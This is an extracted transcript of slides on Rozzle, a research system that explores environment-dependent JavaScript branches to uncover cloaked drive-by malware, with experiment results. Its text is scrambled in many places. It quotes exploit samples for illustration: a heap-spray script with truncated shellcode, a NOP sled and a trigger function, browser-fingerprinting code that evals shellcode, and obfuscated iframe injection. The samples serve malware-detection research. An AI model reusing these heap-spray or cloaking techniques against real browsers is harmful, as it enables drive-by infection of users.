Transcript Rozzle

Rozzle
De-Cloaking Internet Malware
Presenter: Yinzhi Cao
Slides by Ben Livshits
with
Clemens Kolbitsch, Ben Zorn,
Christian Seifert, Paul Rebriy
Microsoft Research
Static – Dynamic Analysis Spectrum
+ High precision
- High overhead
- Low coverage
precision
+ High
DART, SAGE, KLEE
+ High
scalability
+ High
precision
+ Scales
reasonably well
+ High coverage
+ High
coverage
? High
- Low precision
- Watch
out coverage
for resource usage
- May not scale
Entirely static
Symbolic
execution
Multi-execution
Entirely runtime
2
Blacklisting Malware in Search Results
3
Motivation
Haha, I cannot belive this guy actually does this!! LOL
4
5
Drive-by Malware Detection Landscape
offline
(honey-monkey)
Nozzle
[Usenix Security ’09]
online
(browser-based)
• Instrumented browser
• Looks for heap sprays
• Moderately high overhead
runtime
static
Zozzle
[Usenix Security ’11]
• Mostly static detection
• Low overhead, high reach
• Can be deployed in browser
6
Search Engine Crawling
7
Malware Cloaking
<script>
if (navigator.userAgent.indexOf(‘IE 6’)>=0)
{
var x=unescape(‘%u4149%u1982%u90 […]’);
eval(x);
}
</script>
Server side
Client
detect vulnerable
detect crawler
target
•
•
••
Fingerprint browser
Source
&
pluginIPversions
Request
(UserDo
this using
Agent, Browser ID)
JavaScript
8
Client-side Cloaking Defense
Traditional
Rozzle
• Single browser, one visit
• Appear as vulnerable as possible
9
Background and Related Work
• Drive-by Download
– Exploit a client-side browser vulnerability and thus
trigger a malware downloaded into client
– It can be divided into Six steps.
• Description of Six Steps
• Comparing with JShield
10
Step One: visiting malicious web
site
• On this stage, a benign user is visiting a
malicious web site.
• Defense mechanism: if this web site is
detected as malicious, a warning can be
shown to prevent the benign user from
visiting the web site (like Google Safe
Browsing).
11
Step Two: Executing JavaScript
• After downloading contents to the client,
JavaScript get executed.
• Related Work: Current works are trying to fully
execute JavaScript to get a better detection
rate.
– Zozzle ([Usenix, 2011]): Executing JavaScript
– Wepawet: Executing JavaScript and extracting
JavaScript from pdf
– Rozzle ([Oakland, 2012]): Symbolic execution +
fingerprinting JavaScript
12
Step Three: Heap Spraying
• JavaScript will fill the heap with shellcode.
• Defense Mechanism:
– Zozzle ([Usenix, 2011]): Machine learning
– Nozzle ([Usenix, 2009]): Detecting if the heap is
executable or not.
13
Step Four: Exploit a certain
vulnerability
• JavaScript code will use certain pattern to
trigger a native browser vulnerability.
• Defense mechanism:
– BrowserShield: Rewrite JavaScript and check if an
operation will trigger the vulnerability or not. For
example, the length of an operation.
14
Step Five: Downloading malware
• After exploiting native browser vulnerability,
malware is downloaded into client.
• Defense Mechanism:
– Blade ([CCS, 2010]): Detect the GUI of
downloading. If it is not from a normal GUI, reject
the downloaded file.
15
Step Six: Executing malware
• After malware is downloaded, it will get
executed.
• Related Work:
– SpyProxy ([Usenix, 07])
– WebShield ([NDSS, 11])
– Provos et al. ([Usenix, 08])
16
Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments
Detecting Internet Malware
Nozzle: A Defense Against Heap-spraying
Zozzle:
CodeLow-overhead Mostly Static JavaScript
Injection Attacks
Malware Detection
[Usenix Security 2011]
• Bayesian classification of hierarchical features of the
Scan heap allocated objects to identify validJavaScript
x86 codeabstract syntax tree. In the browser (after
sequences
unpacking)
[Usenix Security 2009]
•
Dynamic Detection
Static Detection
Nozzle
Zozzle
18
Nozzle: Runtime Heap Spraying Detection
Normalized attack surface (NAS)
good
bad
19
Zozzle: Static/Statistical Detection
// Shellcode
var shellcode
shellcode=unescape(‘%u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33
unescape
[…]′);
bigblock=unescape(“%u0D0D%u0D0D”);
bigblock
unescape %u0D0D%u0D0D
headersize=20;shellcodesize=headersize+shellcode.length;
shellcodesize
shellcode.length
while(bigblock.length<shellcodesize){bigblock+=bigblock;}
heapshell=bigblock.substring(0,shellcodesize);
bigblock.substring
shellcodesize
nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
nopsled
bigblock.substring
bigblock.length shellcodesize
while(nopsled.length+shellcodesize<0×25000){nopsled=nopsled+nopsled+heapshell}
nopsled.length shellcodesize
nopsled nopsled nopsled heapshell
// Spray
var spray
spray=new Array();
spray
nopsled shellcode
for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
// Trigger
function trigger(){
var varbdy = document.createElement(‘body’);
varbdy.addBehavior
#default#userData
varbdy.addBehavior(‘#default#userData’);
document.appendChild
varbdy
document.appendChild(varbdy);
try {
for (iter=0; iter<10; iter++) {
varbdy.setAttribute
varbdy.setAttribute(‘s’,window);
}
} catch(e){ }
window.status+=”;
}
butid
document.getElementById(‘butid’).onclick();
20
Overview
• Background & Motivation: Cloaking
• Detecting Internet Malware
• Rozzle: Fighting Evasion
• Experiments
Environment Fingerprinting
Prevents Detection
Nozzle
Zozzle
<script>
• In 7.7% of JS files, code gets a
var adobe=new ActiveXObject(‘AcroPDF.PDF’);
<script>
var
(‘$version’);
reference
to environment
if adobeVersion=adobe.GetVariable
(navigator.userAgent.indexOf(‘IE
6’)>=0)
Is
this
a
practical
problem
for
if
(navigator.userAgent.indexOf(‘IE
6’)>=0
&&
{
• ==In’9.1.3’)
1.2%,
code branches
on
our
malware
detectors?
adobeVersion
var x=unescape(‘%u4149%u1982%u90 […]’);
{ eval(x);
such sensitive values
[…]’);
}var x=unescape(‘%u4149%u1982%u90
•
89.5%
of
malicious
JS branches
eval(x);
</script>
}
on such values
</script>
22
Typical Malware Cloaking
23
More Complex Fingerprinting
Fingerprint: Q0193807F127J14
24
Avoiding Dynamic Crawlers
25
Avoiding Static Detection
26
How to Allocate Detection Resources?
Rozzle
1.4
1.5
2.0
9.0
9.1
10.0
8
9
10
…
…
How many resources
Clearly does not scale
should
allocated
to is
What ifbe
the
site simply
filter not
malicious
sites?
malicious?
27
Rozzle
Multi-path execution framework for JavaScript
What it is/does
What it is not
•
Multiple browser profiles
on single machine
•
•
Branch on environmentsensitive checks
No forking
No snapshotting
• Symbolic execution: reverting to a previous state
similar to running multiple
browsers in parallel
•
•
• Execute individual branches
sequentially to increase
coverage
Cluster of machines: too
resource consuming
• Static analysis: Retain much
of runtime precision
28
Multi-Execution in Rozzle
<script>
var adobe=new ActiveXObject(‘AcroPDF.PDF’);
var adobeVersion=adobe.GetVariable (‘$version’);
if (navigator.userAgent.indexOf(‘IE 7’)>=0 &&
adobeVersion == ’9.1.3’)
{
var x=unescape(‘%u4149%u1982%u90 […]’);
eval(x);
}
else if (adobeVersion == ’8.0.1’)
{
var x=unescape(‘%u4073%u8279%u77 […]’);
eval(x);
}
…
</script>
29
Challenges
Consistent updates
of variables
Introduce concept of Symbolic Memory:
• Multiple concrete values associated with one variable
• New JavaScript data type Symbolic
• 3 subtypes
• symbolic value / formula / conditional
• Weak updates for conditional assignments
30
Symbolic Memory
Variable : userAgentString
Value
:0
< navigator.userAgent >
Symbolic : no
yes
<script>
var userAgentString=0;
userAgentString = navigator.userAgent;
var isIE;
isIE = (userAgentString.indexOf(‘IE’)>=0);
…
Hooks into engine, return symbolic values for
• Sensitive global objects: navigator.userAgent,
Variable : isIE
navigator.platform, …
Value
: < navigator.userAgent. indexOf(‘IE’) >= 0 >
•
Sensitive
functions: ScriptEngine(), allocation of
Symbolic : yes
ActiveXObject, …
31
Symbolic Memory
Variable : isIE Variable : isIE
Value
: < nav.userAgent.indexOf(…)>=0
Value
: false
> ? true : false
Symbolic : yes Symbolic : no
Variable :
isIE7
Value
false
<…>
:
Symbolic :
no
yes
<script>
var isIE=false;
var isIE7=false;
if (navigator.userAgent.indexOf(‘IE’)>=0)
{
isIE=true;
if (navigator.userAgent.indexOf(‘IE 7’)>=0)
{
isIE7=true;
Current
Current path
path predicate
predicate
}
Value
:: << nav.userAgent.indexOf(..)>=0
Value
nav.userAgent.indexOf(..)>=0 >> &&
}
Symbolic : yes
< nav.userAgent.indexOf(..)>=0 >
if (isIE7)
Symbolic : yes
{
…
32
Symbolic Memory
Variable : isIE
Value
: < nav.userAgent.indexOf(…)>=0 >
? true : false
Symbolic : yes
?
>=
true
false
index
Of
0
navigator.
userAgent
‘IE’
33
Challenges
• try-blocks regularly used to test availability
• Handling
symbolic values when they are…
of plugins
(ActiveXObjects)
— … written to the DOM
• catch-blocks
default
values,
cannot be
Consistent
updates
— …set
sent
to a remote
server
ignored — … executed (as part of eval)
• Execute
-statementtosimilar
to else
• catch
Lazy evaluation
concrete
values (only when
branch, add
virtual
if-condition:
“
ActiveX
needed)
supported”
of variables
Handling loops
• Loop condition might be symbolic,
number of iterations unknown!
•
•
Indirect control
Unroll k iterations (currently k=1)
flow: Exception
I/O
Instruction pointer checks (endless
handling
loops/recursion)
34
Experiments
Offline
• Controlled Experiment
• 7x more Nozzle detections
Online
• Similar to Bing crawling
• Almost 4x more Nozzle detections
• 10.1% more Zozzle detections
Overhead
• 1.1% runtime overhead
• 1.4% memory overhead
35
Offline
• Exploits hosted on our server
• Minimize external influences
• 70,000 known malicious scripts (flagged by Zozzle)
• Fully unrolled/de-obfuscated exploits, wrapped in HTML
Shared
New Detections
Errors
10,381
+595% runtime detections
-2,000
0
2,000
4,000
6,000
8,000
10,000
12,000
36
Online
• Dedicated machine for crawling the web
• Clone of the Bing malware crawler
• List of URLs recently crawled by Bing
• Pre-filtering: Increase likelihood of finding malicious sites
• 57,000 URLs over the last week
Nozzle Detections
Zozzle Detections
225
24
156
50
174
2,510
+203% runtime detections
37
Overhead
• Average numbers of 3 repeated runs per
configuration
• Base runs (cookie setup)
• 500 randomly selected URLs crawled by Bing
• Slightly biased towards malicious sites (pre-filtering)
Runtime Overhead
Memory Overhead
Median:
0.0%
Median:
0.6%
80th Percentile:
1.1%
80th Percentile:
1.4%
39
1.0
40
2.140
2.104
2.068
1
2.032
1.996
1
1.960
1.924
2
1.888
1.852
121
1.816
1.780
1.744
1
1.708
1
1.672
1.636
1.600
1
1.564
1.528
2
1.492
1.456
1122
1.420
1.384
1
1.348
11
1.312
1.276
223321
1.240
1.204
54
1.168
7 610
1.132
5
1.096
12
1.060
30
1.024
3
112
0.988
6
0.952
0.916
32
0.880
0.844
22
0.808
0.772
0.736
0.700
Overhead Numbers
100
90 88
80
70
70
60
50
40
25
20
13
1
Take Away
For most sites, virtually no overhead
Tremendous impact
on runtime detector
due to increased
path coverage
Visible impact on
static detector
More important with
growing trend to
obfuscation
Also improves other existing tools: Exposes
detectors to additional site content
41
Online
"\x6D"+"\x73\x69\x65
"+"\x20\x36"
… an example pulled from
= our DB…
"msie 6"
if (navigator.userAgent.toLowerCase().indexOf(
"\x6D"+"\x73\x69\x65"+"\x20\x36")>0)
document.write("<iframe src=x6.htm></iframe>");
if (navigator.userAgent.toLowerCase().indexOf(
"\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0)
document.write("<iframe src=x7.htm></iframe>");
"\x6D"+"\x73"+"\x69"+"\
try {
var a; var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl"+[…]);
x65"+"\x20"+"\x37"
} catch(a) { } finally {
=
if (a!="[object Error]")
"msie 7"
document.write("<iframe src=svfl9.htm></iframe>");
}
try {
var c; var f=new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53"+[…]);
} catch(c) { } finally {
"O"+"\x57\x43"+"\x31\x30\x2E\x5
if (c!="[object Error]") {
aacc = "<iframe src=of.htm></iframe>";
3"+"pr"+"ea"+"ds"+"he"+"et"
setTimeout("document.write(aacc)", 3500);
=
} }
"OWC10.Spreadsheet"
42
Summary
• Rozzle: Multi-profile execution
– Look as vulnerable as possible
– Improve existing malware detectors
• Implementation:
– Implemented on top of IE9’s JavaScript engine
– Still some flaws, promising results
• Idea of multi-execution is promising in other contexts
45
Static – Dynamic Analysis Spectrum
+ High precision
- High overhead
- Low coverage
DART,
SAGE
+ High
precision
+ High
precision
+ High
scalability
+ Scales
reasonably well
+ High coverage
+ High
coverage
? Highout
coverage
- Low precision
- Watch
for resource usage
- May not scale
Entirely static
Symbolic
execution
Multi-execution
Entirely runtime
46